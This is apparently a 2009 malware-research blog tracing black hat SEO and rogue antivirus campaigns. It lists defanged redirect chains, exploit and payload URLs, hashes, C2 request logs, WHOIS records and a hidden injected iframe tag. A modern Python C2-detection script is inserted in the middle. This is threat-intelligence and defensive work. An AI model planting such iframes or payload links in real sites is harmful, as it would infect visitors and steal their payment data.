Friday, April 24, 2009

Black Hat SEO and Rogue Antivirus p.9

The silent threat: Black Hat SEO and Rogue Antivirus

Massive black hat campaign still growing: Easter related websites, Ned.org, Ford and more

READ THIS page if you need more information

After Trend Micro researchers claimed that Easter-related sites were used to
redirect visitors to rogue antivirus websites, PandaLabs recently uncovered
similar Black Hat SEO attacks against Ford and Ned.org.

By misusing keywords typically related to global businesses and institutions,
the criminals attract unsuspecting visitors to compromised web sites. These sites
deceive visitors into downloading and installing a fake antivirus product that is
very hard to deactivate or remove. The rogue antivirus gives false alerts to the
user, making them think that their computer is infected. Scared users are then
susceptible to buying the "antivirus protection" via a page that looks like a
secure SSL web site. In fact, their money and confidential credit card information
are stolen by the criminals the moment they enter their personal information
into the payment page.

Many global companies, including Ford, have been exploited in this way. Over a
million compromised web sites used Ford-based keywords to attract visitors to
fake antivirus sites via search engines such as Google (Black hat SEO may force
Google to change algorithm). Other examples of this attack include the misuse
of Easter-related keywords to attract unsuspecting visitors during the Easter
season (Trend Micro Malware Blog - Rotten Eggs: An Easter Malware Campaign).

There are other variants of this type of attack originating from the same
Ukraine/Russia-based criminal fraternity. For example, the criminals use technical
exploits to compromise web sites, blogs, forums and the like. WordPress blog
management software has been a victim of such an exploit, allowing the criminals
to inject malicious code directly into all pages. A visitor to one of these infected
sites will be redirected to another site where rogue antivirus software is again
downloaded (PandaLabs: New Blackhat SEO attack exploits vulnerabilities in
Wordpress to distribute rogue antivirus software).

The criminals put a lot of effort into assuring the longevity of their scam.
Frequent IP changes and moving from location to location help ensure that
they can continue their activities.

You can get more information about all these attacks from the following
resources. The PandaLabs video gives a particularly clear and concise overview.

The following links provide more information about this attack:

The Tech Herald: Malicious SEO targets Ford Motor Company
PandaLabs: Targeted Blackhat SEO Attack against Ford Motor Co.

Read the article on WebProNews: Blackhat SEO spammers force Google’s hand


Related attack:

PandaLabs: Blackhat SEO Fueled Rogue Security Campaign
Sample hijacked search terms (text file)

The website implicated is: getscanonline.com (also hosted on 209.44.126.14).

Softpedia: Easter and Ford Search Results Poisoned

In this case, the files found on the site are detected by Trend Micro as

- TROJ_FAKEAV.BAF
- JS_DLOADER.WKQ

The websites in question are trustsecurityshield.com and topsecurity4you.com,
which have each served for only two or three days (hosted on 209.44.126.14).



Technical details can be found below.


Vulnerabilities in Wordpress exploited to distribute rogue antivirus software

Watch the full video:



I would like to draw your attention to the video above.

This is a screenshot at 03:11

If you zoom into it you will see the domain "load-archive-av-pro.com".
The domain is still active and is shared with many other fake scanner websites,
like "antivir-scan-pro-best.com", as the location of the payload.
Wepawet Analysis




The process:

I will take some keywords found on Ned.org as an example.


The Google cache:



The poisoned keywords:

"Kettle Vally Line Song"


The Google search:



The redirection analysis:

hxxp://cropperddi.fortunecity.com/6766.html
hxxp://sandbergjbo.fortunecity.com/26894.html

Analysis -> redirect to a traffic management system
Analysis -> redirect to a traffic management system

hxxp://redirxl.com/filt/in.cgi?5&group=5q

which then redirects to the malicious site

hxxp://antivir-scan-pro-best.com/11038/3/

The payload is located on the same site that appears in the
PandaLabs article, which is:

hxxp://files.load-archive-av-pro.com/normal/setup_11038_3_1.exe


File size: 104971 bytes
MD5...: 2a9889219ec9d0124892e5e64eaed2bd

VirusTotal
Anubis

---------------------------

64.69.32.220

antivir-scan-pro-best.com

Registrant: Lee Brinkman (leebrinkm@gmail.com)
4396 Ross Street
Mount Vernon
Illinois,62864
US
Tel. +001.65746675653

Creation Date: 17-Apr-2009
Expiration Date: 17-Apr-2010

Domain servers in listed order:
ns2.antivir-scan-pro-best.com
ns1.antivir-scan-pro-best.com


Registrar:
DIRECTI INTERNET SOLUTIONS PVT. LTD.
D/B/A PUBLICDOMAINREGISTRY.COM

Also on this IP - previously used

checker-pc-pro-av.com
sheck-pro-as.com


---------------------------

195.88.80.127 - ECOWEB AS35695 - ecoweb.lv

load-archive-av-pro.com
files.load-archive-av-pro.com

Registrant: Mary Smalls (mary.sma0@gmail.com)
2251 Doctors Drive
Los Angeles
California,90066
US
Tel. +001.86758776498

Creation Date: 17-Apr-2009
Expiration Date: 17-Apr-2010

Domain servers in listed order:
ns2.load-archive-av-pro.com
ns1.load-archive-av-pro.com

Registrar:
DIRECTI INTERNET SOLUTIONS PVT. LTD.
D/B/A PUBLICDOMAINREGISTRY.COM

Also on this IP - previously used

download-pro-as.net
load-antivir-pro-pc.com
files.load-antivir-pro-pc.com






From the article on PandaLabs' blog about the SEO attack against
Ford Motor Co. you can see the domain "globextubes.com",
previously hosted on 64.69.32.203.

This is a graph (from Robtex) of some of these sites serving in
the same campaign:

fasttube2009.com
globalstube2009.com
globextubes.com
streamingtubes2009.com




This is a file found on one of these sites: softwarefortubeview.40011.exe

VirusTotal Report
Anubis Report



Complete analysis below:

After running, it connects to this URL to receive additional payloads to inject.

nhgfngfdhngf.com - 216.240.148.9

ThreatExpert Report

hxxp://nhgfngfdhngf.com/fff9999.php?aid=0&uid=00cd1a40d41d8cd98f00b204e9800998ecf8427e&os=512

hxxp://nhgfngfdhngf.com/eee9999.php?aid=0&uid=00cd1a40d41d8cd98f00b204e9800998ecf8427e&os=512

(216.240.148.9)


The page shows these URLs (file info and VirusTotal report added):

----------------------------------------------------
hxxp://images2009best.com/perce/30f07cdd01ead4f0dd74319d888cfdd9386f80b04bf230740e19c810803919c83e9c9f487472375ee/70e/perce.jpg

VirusTotal - 4/40 (10%)
Anubis Report
File size: 94212 bytes
MD5...: e49048a38d0757b92a34dff6fc3b3f74

HTTP Activity:


----------------------------------------------------

hxxp://venerapictures.com/item/6000dc4d413ac4f08dc431fdc85ccde9d80ff0a04b824084feb9c840903939083e0c4f78441277ced/b0b/item.gif

VirusTotal - 7/40 (17.5%)
Anubis Report
File size: 145412 bytes
MD5...: d2b451fee4f7c42b06121cf03f8ea281

----------------------------------------------------
hxxp://venerapictures.com/werber/900/216.jpg

VirusTotal - 8/40 (20%)
Anubis Report
File size: 99332 bytes
MD5...: 5bc8a73f3412c574909e5f3c193fed89

----------------------------------------------------
hxxp://files.get-fails-load-av.com/exe/setup_200002.exe

VirusTotal - 9/40 (22.5%)
Anubis Report
File size: 78347 bytes
MD5...: ff220534519a1a116dbc2dd712bff24a

HTTP Activity:


----------------------------------------------------

hxxp://lwl-softwares.com/939.exe

VirusTotal - 0/39 (0%)
Anubis Report
File size: 180224 bytes
MD5...: 1ff562c02c68f0a8001135dc89b4eaa1

HTTP Activity:



----------------------------------------------------

hxxp://lwl-softwares.com/important.exe

Anubis Report
File size: 135168 bytes
MD5...: 83b4560333601224cb0d5709bdf57191

Trojan.Win32.Tibs

 

Monday, April 20, 2009

Black Hat SEO and Rogue Antivirus p.8

The silent threat: Black Hat SEO and Rogue Antivirus

Fake Antivirus + Rootkit TDSS / Alureon / DNSChanger Trojan

READ THIS page if you need more information

A quick move to the IP block 209.44.126.0/24 ("Netelligent Hosting Services Inc"), which hosts several fake AV websites as well as exploit pages spreading the TDSS/Alureon trojan.

All of these have been found following iframes injected on legitimate websites, poisoned keywords in the Google search engine and links on an ad network (screenshot below).


Check it out - maybe someone have access to your PC right now! Protect yourself.

Google also shows 14,800 results for this phrase.



Detection:

Trojan TDSS
Trojan DNSChanger
Trojan Kryptik
Trojan FakeSpyGuard
Trojan InternetAntivirusPro

Sites serving for the fake antivirus campaign:

209.44.126.14

activesecurityshield.com
anytoplikedsite.com
basevirusscan.com
bestfiresfull.com
bestsecurityupdate.com
checkonlinesecurity.com
cleanyourpcspace.com
destroyvirusnow.com
fastsecurityscan.com
fastviruscleaner.com
firstscansecurity.com
fuc*moneycash.com
fullandtotalsecurity.com
fullsecurityshield.com
getpcguard.com
getscanonline.com
getsecuritywall.com
greatsecurityshield.com
inetsecuritycenter.com
initialsecurityscan.com
mostpopularscan.com
myfirstsecurityscan.com
mytoplikedsite.com
mytopvirusscan.com
onlinescandetect.com
onlinescanservice.com
popularpcscan.com
runpcscannow.com
scanalertspage.com
scanbaseonline.com
scanprotectiononline.com
scanvistanow.net
securityscan4you.com
securitytopagent.com
thegreatsecurity.com
todaybestscan.com
topsecurity4you.com
topsecurityapp.com
topsoftscanner.com
totalpcdefender.com
totalvirusdestroyer.com
truescansecurity.com
trustsecurityshield.com
upyoursecurity.com
virustopshield.com
vistastabilitynow.com
vistastabilitynow.net
websecuritymaster.com
websecurityvoice.com
yourstabilitysystem.com

209.44.126.16
systemsecurityonline.com
systemsecuritytool.com

209.44.126.29
individualpeople.biz (will be analyzed below)

209.44.126.14
209.44.126.15
209.44.126.16
209.44.126.17
209.44.126.22
209.44.126.23


NS for rogue fake av websites

209.44.126.32
asmmnation.com
ThreatExpert report
In conjunction with an IP in Ukraine: Symantec write-up



On the IP 209.44.126.29 we also have a couple of pages with exploits which lead to the TDSS (Alureon) trojan.

I will take the domain "individualpeople[.]biz" as an example.

Malicious script (IFRAME) inserted. Redirection Analysis

<iframe src="hxxp://individualpeople.biz/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>

Redirects to the page below, which hosts several exploits. Javascript Analysis (Wepawet)

hxxp://individualpeople.biz/go.php?sid=6

Anubis Report

hxxp://209.44.126.30/unsecurity/pdf.php

Wepawet Analysis - VirusTotal

to finally load this page

hxxp://209.44.126.30/unsecurity/load.php

VirusTotal - Anubis

Detections:

W32/Alureon.B!Generic
Win32.Rootkit.TDSS.eyj.4
Packed.Win32.Tdss.f
Trojan.Win32.FakeSpyguard
Trojan:Win32/Alureon.gen!J
Trojan/Fakealert.gen

--------------------------------------

HTTP activity after infection

92.48.91.145:80 - [trafficstatic.net]

Request: GET /banner/crcmds/main
Response: 200 "OK"
Request: GET /banner/crcmds/init
Response: 200 "OK"
Request: GET /banner/uacsrcr.dat
Response: 200 "OK"
Request: GET /banner/crcmds/update
Response: 200 "OK"
Request: GET /banner/crfiles/uacd
Response: 200 "OK"
Request: GET /banner/crfiles/uacc
Response: 200 "OK"
Request: GET /banner/crfiles/uaclog
Response: 200 "OK"
Request: GET /banner/crfiles/uacmask
Response: 200 "OK"
Request: GET /banner/crfiles/uacserf
Response: 200 "OK"
Request: GET /banner/crcmds/types/standart
Response: 404 "Not Found"
Request: GET /banner/crcmds/types/standart
Response: 404 "Not Found"
Request: GET /banner/crcmds/types/standart
Response: 404 "Not Found"
Request: GET /banner/crcmds/affids/11
Response: 404 "Not Found"
Request: GET /banner/crcmds/affids/11
Response: 404 "Not Found"
Request: GET /banner/crcmds/affids/11
Response: 404 "Not Found"
Request: GET /banner/crcmds/subids/v3072
Response: 404 "Not Found"
Request: GET /banner/crcmds/subids/v3072
Response: 404 "Not Found"
Request: GET /banner/crcmds/subids/v3072
Response: 404 "Not Found"
Request: GET /banner/crcmds/builds/bbr
Response: 200 "OK"
Request: GET /banner/crfiles/uacbbr
Response: 200 "OK"

72.233.114.126:80 - [statsanalist.cn]

Request: GET /?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5
Response: 200 "OK"
Request: GET /?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5
Response: 200 "OK"
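The listing above is the kind of record a defender can turn into detection logic without needing the sample itself. As an added example (not code from the post), the following Python parses HTTP activity in the sandbox format printed here and flags the exchanges worth alerting on: requests to the C2 domains named in this post, the /banner/crcmds/ and /banner/crfiles/ command-polling paths, the affid/subid/mode=cr stats beacon, and the repeated-404 retry loop. The first two hosts in the sample are copied from the listing; the third host (example.test on 203.0.113.5) is constructed benign traffic, and the rule labels are my own names.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Sandbox-style HTTP activity in the format the post prints. The first two
# hosts are copied from the listing above; example.test / 203.0.113.5 is
# constructed benign traffic so the rules have something to leave alone.
SAMPLE_ACTIVITY = """\
92.48.91.145:80 - [trafficstatic.net]

Request: GET /banner/crcmds/main
Response: 200 "OK"
Request: GET /banner/uacsrcr.dat
Response: 200 "OK"
Request: GET /banner/crfiles/uacd
Response: 200 "OK"
Request: GET /banner/crcmds/types/standart
Response: 404 "Not Found"
Request: GET /banner/crcmds/types/standart
Response: 404 "Not Found"
Request: GET /banner/crcmds/types/standart
Response: 404 "Not Found"

72.233.114.126:80 - [statsanalist.cn]

Request: GET /?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5
Response: 200 "OK"

203.0.113.5:80 - [example.test]

Request: GET /index.html
Response: 200 "OK"
"""

HOST_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d+) - \[([^\]]+)\]$")
REQ_RE = re.compile(r"^Request: ([A-Z]+) (\S+)$")
RESP_RE = re.compile(r"^Response: (\d{3})")

# Domains taken from this post's "IPs implicated" and ThreatExpert pivots.
KNOWN_C2_DOMAINS = {"trafficstatic.net", "trafficstatic.com", "statsanalist.cn",
                    "explorerex.com", "windowslogonex.com"}
# Command-polling path prefixes seen in the activity above.
C2_PATH_PREFIXES = ("/banner/crcmds/", "/banner/crfiles/")


def parse_activity(text):
    """Turn the host / Request / Response listing into one dict per exchange."""
    records, host, pending = [], None, None
    for line in text.splitlines():
        line = line.strip()
        if m := HOST_RE.match(line):
            host = (m.group(1), m.group(3))
        elif m := REQ_RE.match(line):
            pending = (m.group(1), m.group(2))
        elif (m := RESP_RE.match(line)) and host and pending:
            records.append({"ip": host[0], "domain": host[1], "method": pending[0],
                            "path": pending[1], "status": int(m.group(1))})
            pending = None
    return records


def classify(rec):
    """Labels that apply to one exchange; an empty list means nothing to report."""
    labels = []
    if rec["domain"] in KNOWN_C2_DOMAINS:
        labels.append("known-c2-domain")
    if rec["path"].startswith(C2_PATH_PREFIXES):
        labels.append("tdss-command-poll")
    query = parse_qs(urlsplit(rec["path"]).query)
    if query.get("mode") == ["cr"] and "affid" in query and "subid" in query:
        labels.append("affiliate-stats-beacon")
    return labels


def flag_activity(text):
    """(domain, path, labels) for every exchange that matched at least one rule."""
    flagged = []
    for rec in parse_activity(text):
        labels = classify(rec)
        if labels:
            flagged.append((rec["domain"], rec["path"], labels))
    return flagged


def repeated_404s(text, min_count=3):
    """Paths a host keeps asking for and keeps getting 404 on: the retry loop
    the TDSS client shows above for types/standart, affids and subids."""
    counts = Counter((r["domain"], r["path"])
                     for r in parse_activity(text) if r["status"] == 404)
    return {key: n for key, n in counts.items() if n >= min_count}


if __name__ == "__main__":
    for domain, path, labels in flag_activity(SAMPLE_ACTIVITY):
        print(f"{domain} {path} -> {', '.join(labels)}")
    print(repeated_404s(SAMPLE_ACTIVITY))
```

The path rule is deliberately narrow (/banner/crcmds/ and /banner/crfiles/ rather than /banner/) because /banner/ alone appears in plenty of legitimate ad traffic; the domain set carries the rest, and the repeated-404 check catches the polling behaviour even when the domain changes.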


IPs implicated:

209.44.126.14
209.44.126.15
209.44.126.16
209.44.126.17
209.44.126.22
209.44.126.23
209.44.126.29
209.44.126.32

Other domains in conjunction can be found using ThreatExpert

/banner/crcmds/main

Report 1
Report 2

92.48.91.144
trafficstatic.com
explorerex.com
windowslogonex.com

92.48.91.145
trafficstatic.net
ThreatExpert Report

95.211.14.159
golddiggero1.com

76.76.103.162
webieupdate.net

94.76.208.32
symupdate2.com
ThreatExpert Report

72.233.114.125
webnicrisoft.net
ThreatExpert Report

64.213.140.254
webmsupdate.net
ThreatExpert Report

 

Black Hat SEO - RBN Hacks, p.4

The silent threat: Black Hat SEO, exploits, hacks, botnets

Crimeware toolkits in the wild

READ THIS page if you need more information

WARNING: All sites listed on this page are dangerous (live URLs with exploits)
which lead to trojans being automatically installed on your computer.
Do NOT visit them unless you know what you are doing.
(only links are safe)

Another very good example is the site below, which leads to other domains in the network previously cited ("Eurohost LLC") and shows that this attack seems to be everywhere.

IFrames injected, PDF malware + viruses. Some screenshots are attached.


Infected page:

hxxp://team-sleep.by.ru/default2.html

Analysis

hxxp://8addition.info/t/?75724cae9d
hxxp://sexbases.cn/in.cgi?16&161b72
hxxp://utevox.site90.com/f/index.php

************
Infected page:

hxxp://team-sleep.by.ru/demo.html

Analysis

Requests:

hxxp://bizoplata.ru/pay.html?
hxxp://bizoplata.ru/ballast.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://bizoplata.ru/post.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://mixbunch.cn/bowling.html
hxxp://famajormusic.ru/jjkj/pdf.php

Redirects:

hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php

hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php

************
Infected page:

hxxp://team-sleep.by.ru/gold.html

Analysis

Requests:

hxxp://team-sleep.by.ru/gold.html
hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php

Redirects:

hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php

hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php


************
Infected page:

hxxp://team-sleep.by.ru/googleanalyticsru.html

Analysis

Requests:

hxxp://team-sleep.by.ru/googleanalyticsru.html
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://sunmaiamibich.ru/

Redirects:

hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php

************
Infected page:

hxxp://team-sleep.by.ru/media.html

Analysis

Requests:

hxxp://team-sleep.by.ru/media.html
hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php

Redirects:

hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php

hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php


************
Infected page:

hxxp://team-sleep.by.ru/menu.html

Analysis

Requests:

hxxp://team-sleep.by.ru/menu.html
hxxp://bizoplata.ru/pay.html?
hxxp://bizoplata.ru/ballast.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://bizoplata.ru/post.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php
hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://mixbunch.cn/bowling.html

Redirects:

hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php

hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php


************
Infected page:

hxxp://team-sleep.by.ru/news.html

Analysis

Requests:

hxxp://moneypuller.site90.net/images/gallery/index.php
hxxp://error.000webhost.com/not_found.html
hxxp://www.000webhost.com/?id=1
hxxp://www.000webhost.com/
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php

Redirects:

hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php

************
Infected page:

hxxp://team-sleep.by.ru/photo2.html

Analysis

Requests:

hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php
hxxp://bizoplata.ru/pay.html?
hxxp://bizoplata.ru/ballast.html
hxxp://bizoplata.ru/post.html
hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php

Redirects:

hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php

hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php


************
Infected page:

hxxp://team-sleep.by.ru/poem.html

Analysis

Requests:

hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php
hxxp://bizoplata.ru/pay.html?
hxxp://bizoplata.ru/ballast.html
hxxp://bizoplata.ru/post.html

Redirects:

hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php

************
Infected page:

hxxp://team-sleep.by.ru/press_reviews.html

Analysis

Requests:

hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php
hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php

Redirects:

hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php

hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php


************
Infected page:

hxxp://team-sleep.by.ru/team-sleep.html

Analysis

Requests:

hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php
hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php

Redirects:

hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php

hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php


************
Infected page:

hxxp://team-sleep.by.ru/gmail.php

Analysis

Requests:

hxxp://counnter.cn/top100_00.js
hxxp://counnter.cn/z/count.php?o=1
hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php

Redirects:

hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php


************
Infected page:

hxxp://team-sleep.by.ru/haitou.php

Analysis

Requests:

hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php

************
Infected page:

hxxp://team-sleep.by.ru/in.php

Analysis

Requests:

hxxp://www.rogercombs.org/index.php
hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php

************
Infected page:

hxxp://team-sleep.by.ru/photo/team.html

Analysis

Requests:

hxxp://analytics-google.info/s/urchin.js
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php
hxxp://77.221.133.172/.if/go.html?
hxxp://by.ru/info/?where

************
Infected page:

hxxp://team-sleep.by.ru/photo/wallz.html

Analysis

Requests:

hxxp://analytics-google.info/s/urchin.js
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php
hxxp://bizoplata.ru/pay.html?
hxxp://bizoplata.ru/ballast.html
hxxp://bizoplata.ru/post.html
hxxp://by.ru/info/?where

************
Infected page:

hxxp://team-sleep.by.ru/photo/live/index2.html

Analysis

Requests:

hxxp://utevox.site90.com/f/index.php
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php

************
Infected page:

hxxp://team-sleep.by.ru/photo/live/imagepages/image1.html


Analysis

Requests:

hxxp://analytics-google.info/s/urchin.js
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php

************
Infected page:

hxxp://team-sleep.by.ru/photo/members/imagepages/image1.html

Analysis

Requests:

hxxp://analytics-google.info/s/urchin.js
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php

************
Infected page:

hxxp://team-sleep.by.ru/photo/team/imagepages/image1.html

Analysis

On this page the domain appears to have previously been involved in the Asprox malware campaign, as fgg.js and script.js are still present on the page.

However, none of these are responding.

Finjan report
Google Search for fgg.js
Google Search for www.netcfg9.ru

hxxp://www.jve4.ru/fgg.js
hxxp://www.nmr43.ru/fgg.js
hxxp://www.mj5f.ru/script.js
hxxp://www.vswc.ru/script.js
hxxp://www.pkseio.ru/script.js
hxxp://www.4log-in.ru/script.js
hxxp://www.netcfg9.ru/script.js
hxxp://www.sitevgb.ru/script.js
hxxp://www.errghr.ru/script.js
hxxp://www.81dns.ru/script.js
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php


************
Infected page:

hxxp://tochtonenado.com/yes/index.php
hxxp://tochtonenado.com/yes/load.php?stat=Windows

Analysis

Trojan Waledac.GEN

Anubis Report

Botnet Controller

89.149.244.140:80 - [djbobroff.ru]
Request: GET /spm/index.php?id=584E5E43
Response: 200 "OK"
Request: GET /spm/index.php?id=584E5E43&download=0000138F
Response: 200 "OK"
Request: POST /spm/index.php?id=584E5E43&mid=5007
Response: 200 "OK"

C:\WINDOWS\system32\DRIVERS\asyncmac.sys

*****************

Exploits:

hxxp://5rublei.com/unique/index.php - Analysis - VirusTotal - Anubis
hxxp://bizoplata.ru/ballast.html - Analysis
hxxp://bizoplata.ru/courier.html - Analysis
hxxp://bizoplata.ru/pay.html? - Analysis
hxxp://bizoplata.ru/post.html - Analysis
hxxp://dasretokfin.com/load.php - Analysis
hxxp://mixbunch.cn/thread.html - Analysis
hxxp://mixbunch.cn/golf.html - Analysis
hxxp://mixbunch.cn/bowling.html - Analysis
hxxp://peskufex.cn/ss/in.cgi?2 - Source
hxxp://startdontstop.ru/bigmac.html - Analysis
hxxp://sunmaiamibich.ru/pupu/in.php - Analysis
hxxp://sunmaiamibich.ru/pupu/load.php - VirusTotal - Anubis
hxxp://tixwagoq.cn/in.cgi?4 - Analysis
hxxp://tochtonenado.com/yes/index.php - Analysis
hxxp://tochtonenado.com/yes/load.php - Anubis
hxxp://tochtonenado.com/yes/include/spl.php - Analysis
hxxp://utevox.site90.com/f/index.php - Analysis
hxxp://utevox.site90.com/f/load.php - dead


91.212.41.91

hxxp://mixbunch.cn
hxxp://sunmaiamibich.ru

91.212.65.7

hxxp://peskufex.cn

95.129.144.228

hxxp://5rublei.com
hxxp://dasretokfin.com
hxxp://tochtonenado.com

95.129.144.13

hxxp://bizoplata.ru
hxxp://startdontstop.ru

64.235.52.170

hxxp://utevox.site90.com

************************

Domain Name: mixbunch.cn
ROID: 20081108s10001s82359461-cn
Domain Status: clientTransferProhibited
Registrant Organization: Raymond Keaton
Registrant Name: Raymond Keaton
Administrative Email: Keaton@cybernauttech.com
Sponsoring Registrar: 广东时代互联科技有限公司
Name Server:ns1.softwaresupport-group.com
Name Server:ns2.softwaresupport-group.com
Registration Date: 2008-11-08 16:06
Expiration Date: 2009-11-08 16:06

domain: sunmaiamibich.ru
type: CORPORATE
nserver: ns1.softwaresupport-group.com.
nserver: ns2.softwaresupport-group.com.
state: REGISTERED, DELEGATED
person: Private person
phone: +7 910 3478712
e-mail: dmitrijstanislavskij@yandex.ru
registrar: REGRU-REG-RIPN
created: 2009.04.16
paid-till: 2010.04.16
source: TC-RIPN

Domain Name: peskufex.cn
ROID: 20090315s10001s50367993-cn
Domain Status: clientDeleteProhibited
Domain Status: clientTransferProhibited
Registrant Organization: 永也进出口公司
Registrant Name: 张龙
Administrative Email: alvin_555@yeah.net
Sponsoring Registrar: 易名中国
Name Server:ns2.dnsmytruedns.com
Name Server:ns1.dnsmytruedns.com
Registration Date: 2009-03-15 15:37
Expiration Date: 2010-03-15 15:37

Domain Name: 5rublei.com
Registrar: BIZCN.COM, INC.
